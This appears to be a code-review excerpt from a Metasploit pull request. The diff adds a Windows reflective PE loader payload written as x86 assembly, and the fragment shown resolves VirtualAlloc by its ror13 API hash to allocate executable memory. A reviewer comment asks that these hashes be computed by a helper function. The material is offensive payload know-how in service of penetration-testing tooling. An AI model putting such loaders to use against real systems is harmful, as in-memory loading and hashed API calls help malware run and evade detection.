lib/msf/core/payload/windows/reflective_pe_loader.rb

```diff
@@ -0,0 +1,179 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/block_api'
+
+module Msf
+
+
+###
+#
+#  Reflective PE loader for Windows x86 PE files
+#  Source: https://github.com/EgeBalci/Amber/tree/master/core
+#
+###
+
+
+  module Payload::Windows::ReflectivePELoader
+    include Payload::Windows::BlockApi
+    def asm_reflective_pe_loader
+      raw = %Q^
+stub:
+	cld                     ; Clear direction flags
+  pop esi                 ; Get the address of image to esi
+	call $+5                ; Push the current EIP to stack
+	sub [esp],esi           ; Subtract &PE from EIP and get image_size
+	call start              ; Push the address of API to stack
+	#{asm_block_api}
+start:                    ;
+	pop ebp                 ; Get the address of api to ebp
+	mov eax,[esi+0x3C]      ; Get the offset of "PE" to eax
+	mov ebx,[eax+esi+0x34]  ; Get the image base address to ebx
+	mov eax,[eax+esi+0x28]  ; Get the address of entry point to eax
+	push eax                ; Save the adress of entry to stack
+	push 0x40               ; PAGE_EXECUTE_READ_WRITE
+	push 0x103000           ; MEM_COMMI | MEM_TOP_DOWN | MEM_RESERVE
+	push dword [esp+12]     ; dwSize
+	push 0x00               ; lpAddress
+	push 0xE553A458         ; ror13( "kernel32.dll", "VirtualAlloc" )
```

Comment:
We have a function that calculates the hash for all of these, can you please update __all__ of these hard coded instances to use it? It'll become important if we ever update the block API algorithm to do something like XOR those static values which we've dicsussed.

`#{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}`